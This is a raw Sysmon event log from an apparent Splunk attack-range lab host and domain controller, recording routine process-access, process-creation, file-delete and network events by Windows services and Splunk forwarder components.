10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E05-6216-F303-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E05-6216-F303-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.811{4F8D34B0-0E05-6216-F303-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.560{4F8D34B0-0E05-6216-F203-000000003902}31923964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E05-6216-F203-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0E05-6216-F203-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E05-6216-F203-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.310{4F8D34B0-0E05-6216-F203-000000003902}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:50.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC34F25F776A9A6AA185489BB0EB846A,SHA256=F1DDC3F356CB58AF0143C9F1D44B79C134F42A4755E3884AC8D705073162D4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:50.325{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23D6DCCDD276B0838495FDD79D73044F,SHA256=7530635EEBC77B9C3AFCD3F6F6EC2D59217C4DFE48C55D242A71C3C81C2CBBA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:50.107{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B796000C04C0521A286C030EE5AADB0,SHA256=1C7015BC4EF194C745D05234913FEDB59FE860F8F98B055DF3E3CCF22C11992F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:47.513{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53215-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000214081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:50.013{4F8D34B0-0E05-6216-F303-000000003902}27521904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E07-6216-F403-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 